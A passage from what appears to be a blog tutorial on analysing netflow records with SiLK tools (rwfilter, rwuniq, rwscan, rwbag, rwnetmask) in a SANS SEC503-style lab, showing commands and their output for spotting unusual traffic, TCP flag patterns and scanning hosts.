<span style="color: white;"> 172.28.30.4| 184.51.157.69|58644| 443| 1| 124|</span>
<span style="color: white;"> 172.28.20.6| 23.58.146.215|49308| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.4| 23.58.146.215|57496| 443| 1| 124|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Obviously something is wrong above. There is just too much commonality there. Let's see, 20 (IP header length) + (assume) 20 (TCP header) = 84 bytes. Each of these packets have ~84 bytes of IP TCP data. Looks at the IPs also to find the commonality.<br /><br />Resolve those IP addresses of the hosts above, using <b><i>rwresolve</i></b>.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --type=out,outweb \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--dport=443 --bytes-per-packet=0-250 | rwstats --value=bytes --fields=sip,dip,sport,dport,packets --count=5 --ipv6-policy=ignore \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--no-percent | rwresolve</span></b></span>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|sPort|dPort| packets| Bytes|</span>
<span style="color: white;"> 172.28.20.6|a23-58-146-216.deploy.static.akamaitechnologies.com|56289| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.3|a23-58-146-216.deploy.static.akamaitechnologies.com|56311| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.4|a184-51-157-69.deploy.static.akamaitechnologies.com|58644| 443| 1| 124|</span>
<span style="color: white;"> 172.28.20.6|a23-58-146-215.deploy.static.akamaitechnologies.com|49308| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.4|a23-58-146-215.deploy.static.akamaitechnologies.com|57496| 443| 1| 124|</span>
</pre></td></tr></tbody></table></div>
<br />Focus on one particular address using the --any-address flag with <b><i>rwfilter</i></b>. Pipe the output to <b><i>rwstats</i></b>.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--bytes</span><span>-per-packet=0-250 --duration=0- --any-address=23.58.146.216 | rwstats --value=bytes \</span></span></b></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=stime,sip,dip,sport,dport,packets,duration,type,proto --count=5 --ipv6-policy=ignore --no-percent \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--bin=3600</b></span>
<span style="color: white;">INPUT: 3 Records for 3 Bins and 372 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| type|pro| Bytes|</span>
<span style="color: white;">2022/03/06T21:00:00| 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| out| 17| 124|</span>
<span style="color: white;">2022/03/04T17:00:00| 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| out| 17| 124|</span>
<span style="color: white;">2022/02/17T17:00:00| 172.28.20.6| 23.58.146.216|56289| 443| 1| 0| out| 17| 124|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Above is interesting, as the traffic is all on UDP 443 rather than TCP.. QUIC?</div><div><br />Keeping it simple by finding the first 10 records that match a particular query using <b><i>rwfilter </i></b>and <b><i>rwuniq</i></b>.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=6 --pass-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--max-pass=10 | rwuniq --fields sip,sport,dip,dport</b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| Records|</span>
<span style="color: white;"> 52.109.88.36| 443| 172.28.10.89|56674| 1|</span>
<span style="color: white;"> 10.200.223.4|50494| 172.28.10.5| 22| 1|</span>
<span style="color: white;"> 142.250.72.10| 443| 172.28.20.5|53715| 1|</span>
<span style="color: white;"> 172.28.10.5| 22| 10.200.223.4|50494| 1|</span>
<span style="color: white;"> 52.109.88.36| 443| 172.28.10.89|56673| 1|</span>
<span style="color: white;"> 10.200.223.4|50673| 172.28.1.1| 22| 1|</span>
<span style="color: white;"> 142.250.72.35| 443| 172.28.30.5|53821| 1|</span>
<span style="color: white;"> 20.50.73.10| 443| 172.28.10.89|56669| 1|</span>
<span style="color: white;"> 20.189.173.13| 443| 172.28.10.80|64499| 1|</span>
<span style="color: white;"> 142.250.72.35| 443| 172.28.20.5|53714| 1|</span>
</pre></td></tr></tbody></table></div>
<br />Find the first 10 records that fails (think <i>grep --invert-match</i> or <i>grep -v</i>) the query, using <b><i>rwfilter </i></b>and rwuniq. Notice rather than <i>--pass-destination </i>it is now <i>--fail-destination.</i>. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --fail-destination=stdout --max-fail=10 | rwuniq \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--fields sip,sport,dip,dport --ipv6-policy=ignore</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| Records|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56104| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|54512| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55382| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55171| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56350| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55339| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|54864| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56290| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55359| 1|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56213| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /><br />Combining the <b><i>rwfilter</i> </b><i>--pass-destination </i>and <i>--fail-destination </i>as well as writing <i>--pass-destination </i>and <i>--fail-destination </i>to file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=6 --pass-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=10 --fail-destination=6-fail.rw --max-fail=10 | rwfilter stdin --aport=443 --fail-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=pass-443 | rwuniq --fields sip,sport,dip,dport</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| Records|</span>
<span style="color: white;"> 10.200.223.4|50494| 172.28.10.5| 22| 1|</span>
<span style="color: white;"> 172.28.10.5| 22| 10.200.223.4|50494| 1|</span>
<span style="color: white;"> 10.200.223.4|50673| 172.28.1.1| 22| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Find 5 unique sessions that were initiated by the client. That is the device sending the <i>SYN</i> packet. Note the <i>--flags-initial </i>with <b style="font-style: italic;">rwfilter</b>. <i>S/SA </i>means we are looking to see if the SYN flag is set while testing the <i>SYN</i> and <i>ACK </i>flags.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --aport=443 --flags-initial=S/SA \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=5 | rwuniq --fields stime,sIP,dIP,flags,initialflags,duration --values=records</span></b></span>
<span style="color: white;"> sTime| sIP| dIP| flags|initialF|durat| Records|</span>
<span style="color: white;">2019/05/02T16:30:15| 172.16.10.13| 13.107.5.88| SRPA | S | 0| 1|</span>
<span style="color: white;">2019/05/02T16:29:56| 172.16.10.13| 65.55.44.108|FSRPA | S | 132| 1|</span>
<span style="color: white;">2019/05/02T16:31:04| 172.16.10.13| 65.55.44.109| SRPA | S | 4| 1|</span>
<span style="color: white;">2019/05/02T16:30:45| 172.16.10.13| 157.55.135.128|FS PA | S | 19| 1|</span>
<span style="color: white;">2019/05/02T16:30:15| 172.16.10.13| 13.107.3.128| SRPA | S | 0| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Similarly find the devices acting as a server. Meaning, the device responded to a <i>SYN</i> with a <i>SYN/ACK</i>. Notice the <i><b>rwfilter </b>--flags-initial=SA/SA </i>now shows test <i>SYN/ACK </i>to see if both <i>SYN </i>and <i>ACK </i>are set.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$</span><b><span style="color: #fcff01;"> rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --aport=443 --flags-initial=SA/SA \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=5 | rwuniq --fields stime,sIP,dIP,flags,initialflags,duration --values=records</span></b></span>
<span style="color: white;"> sTime| sIP| dIP| flags|initialF|durat| Records|</span>
<span style="color: white;">2019/05/02T16:30:15| 13.107.3.128| 172.16.10.13| S A | S A | 0| 1|</span>
<span style="color: white;">2019/05/02T16:30:45| 157.55.135.128| 172.16.10.13|FSRPA | S A | 19| 1|</span>
<span style="color: white;">2019/05/02T16:31:04| 65.55.44.109| 172.16.10.13| S PA | S A | 4| 1|</span>
<span style="color: white;">2019/05/02T16:29:56| 65.55.44.108| 172.16.10.13| S PA | S A | 132| 1|</span>
<span style="color: white;">2019/05/02T16:30:15| 13.107.5.88| 172.16.10.13| S A | S A | 0| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /><div>Find 5 unique sessions that seems to have been fully completed. Notice the <i><b>rwfilter</b> --flags-</i></div><div><i>all=SAFP/FSRPA </i>tests the <i>FIN, SYN, RST, PUSH and ACK </i>flags to see if <i>SYN, ACK, FIN </i>and <i>PUSH </i>are set.</div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --dport=22,80,443,4444 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--flags-</span></b></span><b><span style="color: #fcff01;"><span>all=SAFP/FSRPA --max-pass=5 | rwuniq --fields stime,sIP,dIP,dport,flags,type --values=records</span></span></b>
<span style="color: white;"> sTime| sIP| dIP|dPort| flags| type| Records|</span>
<span style="color: white;">2019/05/02T16:38:30| 172.16.10.13| 192.96.162.110| 80|FS PA | outweb| 1|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 192.96.162.33| 80|FS PA | outweb| 2|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 23.33.106.133| 80|FS PA | outweb| 1|</span>
<span style="color: white;">2019/05/02T16:30:45| 172.16.10.13| 157.55.135.128| 443|FS PA | outweb| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Look at the last 5 sessions again, this time add duration field to <b><i>rwuniq</i></b>. Added flows and bytes to the <i>--values</i>.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --dport=22,80,443,4444 --flags-all=SAFP/FSRPA --max-pass=5 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwuniq --fields stime,sIP,dIP,dport,flags,type,duration --values=flows,bytes,packets</span></b></span>
<span style="color: white;"> sTime| sIP| dIP|dPort| flags| type|durat| Records| Bytes| Packets|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 192.96.162.33| 80|FS PA | outweb| 78| 2| 977| 14|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 23.33.106.133| 80|FS PA | outweb| 78| 1| 505| 7|</span>
<span style="color: white;">2019/05/02T16:30:45| 172.16.10.13| 157.55.135.128| 443|FS PA | outweb| 19| 1| 6297| 16|</span>
<span style="color: white;">2019/05/02T16:38:30| 172.16.10.13| 192.96.162.110| 80|FS PA | outweb| 108| 1| 575| 7|</span>
</pre></td></tr></tbody></table></div>
<br />Leveraging <b><i>rwbag</i></b>. Preparing the data via <b><i>rwfilter</i></b>, then redirect it to <b><i>rwbag</i></b>.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=stdout --dport=22,80,443,4444 --max</span></b></span><b><span style="color: #fcff01;"><span>-pass=5 | \</span></span></b></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>rwbag --bag-file=sipv4,sum-bytes,/tmp/test.bag</span></span></b>
</pre></td></tr></tbody></table></div>
<br />Viewing the contents in the bag created via <i><b>rwbag</b></i>.<br /><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwbagcat test.bag</span></b></span>
<span style="color: white;"> 172.16.10.13| 8106|</span>
<span style="color: white;"> 172.16.40.12| 80|</span>
</pre></td></tr></tbody></table></div>
</div><div><br />Leveraging <b><i>rwscan </i></b>to identify potential scanning IPs.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwsort --fields sip,protocol,dip | rwscan --scan-model=2</span></b></span>
<span style="color: white;"> sip| proto| stime| etime| flows| packets| bytes|</span>
<span style="color: white;"> 10.200.223.2| 6| 2022-03-07 11:59:46| 2022-04-30 23:49:43| 1061401| 57208212|3107887558|</span>
<span style="color: white;"> 10.200.223.3| 6| 2022-02-09 12:51:11| 2022-04-30 16:36:16| 413308| 10588224| 583916721|</span>
<span style="color: white;"> 10.200.223.4| 6| 2022-02-08 14:26:13| 2022-04-30 00:14:41| 3749647| 65736155|4056928153|</span>
<span style="color: white;"> 10.200.223.5| 6| 2022-02-11 20:55:22| 2022-04-30 15:11:11| 2776970| 7508499| 406143689|</span>
<span style="color: white;"> 10.200.223.7| 6| 2022-02-08 15:50:32| 2022-03-24 22:18:35| 149108| 4259383| 241338192|</span>
<span style="color: white;"> 10.200.223.8| 6| 2022-02-11 21:06:29| 2022-04-30 03:01:23| 232009| 3673446| 177412489|</span>
<span style="color: white;"> 172.28.20.3| 6| 2022-02-18 16:23:53| 2022-04-30 23:15:50| 299| 1430| 181320|</span>
<span style="color: white;"> 172.28.20.4| 6| 2022-02-24 18:32:19| 2022-04-29 23:05:43| 224| 1207| 170436|</span>
<span style="color: white;"> 172.28.20.6| 6| 2022-02-16 16:05:19| 2022-04-21 01:39:55| 8202| 24551| 1342732|</span>
<span style="color: white;"> 172.28.30.2| 6| 2022-02-16 16:26:12| 2022-04-26 16:05:56| 544| 2724| 351448|</span>
<span style="color: white;"> 172.28.30.3| 6| 2022-02-10 17:42:20| 2022-03-19 18:53:36| 168| 497| 25844|</span>
<span style="color: white;"> 172.28.30.4| 6| 2022-02-08 20:47:57| 2022-04-28 16:56:30| 525| 2626| 350572|</span>
<span style="color: white;"> 172.28.30.5| 6| 2022-02-10 18:05:52| 2022-04-30 15:16:06| 446| 2428| 334660|</span>
<span style="color: white;"> 172.28.50.2| 6| 2022-02-10 18:41:21| 2022-04-29 15:55:32| 580| 2883| 367628|</span>
</pre></td></tr></tbody></table></div>
<br />Narrowing above down to only the IPs and storing them in the bag. First get the data via <b><i>rwfilter</i></b>, <b><i>rwsort </i></b>and <b><i>rwscan</i></b>. The pipe this data into cut.<p></p></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout | rwsort --fields sip,protocol,dip | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwscan --scan-model=2 --no-title --output-path=stdout | cut --fields=1,5 --delimiter='|'</span></b></span>
<span style="color: white;"> 10.200.223.2| 1061401</span>
<span style="color: white;"> 10.200.223.3| 413308</span>
<span style="color: white;"> 10.200.223.4| 3749647</span>
<span style="color: white;"> 10.200.223.5| 2776970</span>
<span style="color: white;"> 10.200.223.7| 149108</span>
<span style="color: white;"> 10.200.223.8| 232009</span>
<span style="color: white;"> 172.28.20.3| 299</span>
<span style="color: white;"> 172.28.20.4| 224</span>
<span style="color: white;"> 172.28.20.6| 8202</span>
<span style="color: white;"> 172.28.30.2| 544</span>
<span style="color: white;"> 172.28.30.3| 168</span>
<span style="color: white;"> 172.28.30.4| 525</span>
<span style="color: white;"> 172.28.30.5| 446</span>
<span style="color: white;"> 172.28.50.2| 580</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Create the bag consisting of the IPs shows above. Reading directly from <b><i>rwfilter</i></b>. Pipe it into <b><i>rwsort</i></b>, then <b><i>rwscan </i></b>then <b><i>rwbagbuild</i></b>. After building the bag, use <b><i>rwbagcat </i></b>to view the records.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout | rwsort --fields sip,protocol,dip | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwscan --scan-model=2 --no-title --output-path=stdout | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">cut --fields=1,5 --delimiter='|' | rwbagbuild --bag-input=stdin --key-type=sipv4 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--counter-type=records | rwbagcat</span></b></span>
<span style="color: white;"> 10.200.223.2| 1061401|</span>
<span style="color: white;"> 10.200.223.3| 413308|</span>
<span style="color: white;"> 10.200.223.4| 3749647|</span>
<span style="color: white;"> 10.200.223.5| 2776970|</span>
<span style="color: white;"> 10.200.223.7| 149108|</span>
<span style="color: white;"> 10.200.223.8| 232009|</span>
<span style="color: white;"> 172.28.20.3| 299|</span>
<span style="color: white;"> 172.28.20.4| 224|</span>
<span style="color: white;"> 172.28.20.6| 8202|</span>
<span style="color: white;"> 172.28.30.2| 544|</span>
<span style="color: white;"> 172.28.30.3| 168|</span>
<span style="color: white;"> 172.28.30.4| 525|</span>
<span style="color: white;"> 172.28.30.5| 446|</span>
<span style="color: white;"> 172.28.50.2| 580|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Alternatively, group the bags by IPs. Notice <i>--bin-ips </i>to <b><i>rwbagcat</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout | rwsort --fields sip,protocol,dip | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwscan --scan-model=2 --no-title --output-path=stdout | cut --fields=1 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--delimiter='|' | sort --unique | rwbagbuild --bag-input=stdin --key-type=sipv4 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--counter-type=records | rwbagcat --bin-ips</span></b></span>
<span style="color: white;"> 1| 14|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><br /></div><div>Introducing <b><i>rwnetmask</i></b>. Maybe you have a network where communication looks like this.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/04/01T0 --end-date=2022/05/01 --protocol=6 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=stdout --max-pass=5 | rwuniq --fields sip,dip</span></b></span>
<span style="color: white;"> sIP| dIP| Records|</span>
<span style="color: white;"> 52.167.17.97| 172.28.20.4| 1|</span>
<span style="color: white;"> 20.72.205.209| 172.28.30.3| 1|</span>
<span style="color: white;"> 52.109.88.35| 172.28.30.4| 1|</span>
<span style="color: white;"> 52.167.17.97| 172.28.30.4| 1|</span>
<span style="color: white;"> 20.72.205.209| 172.28.10.10| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div>Rather than getting the full IP, you decide you would like to have a 24 bit mask of the IP address. Using the <b><i>rwnetmask</i></b>, we see we were able to change the IP address to /24 networks.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/04/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout --max-pass=5 | rwnetmask \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--4sip-prefix-length=24 --4dip-prefix-length=24 | rwcut --fields sip,dip</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 52.167.17.0| 172.28.20.0|</span>
<span style="color: white;"> 52.167.17.0| 172.28.30.0|</span>
<span style="color: white;"> 20.72.205.0| 172.28.10.0|</span>
<span style="color: white;"> 52.109.88.0| 172.28.30.0|</span>
<span style="color: white;"> 20.72.205.0| 172.28.30.0|</span>
</pre></td></tr></tbody></table></div>
</div><div>Find the well-known TCP ports on the network which seems to be the busiest, via <b><i>rwfilter </i></b>and <b><i>rwuniq</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
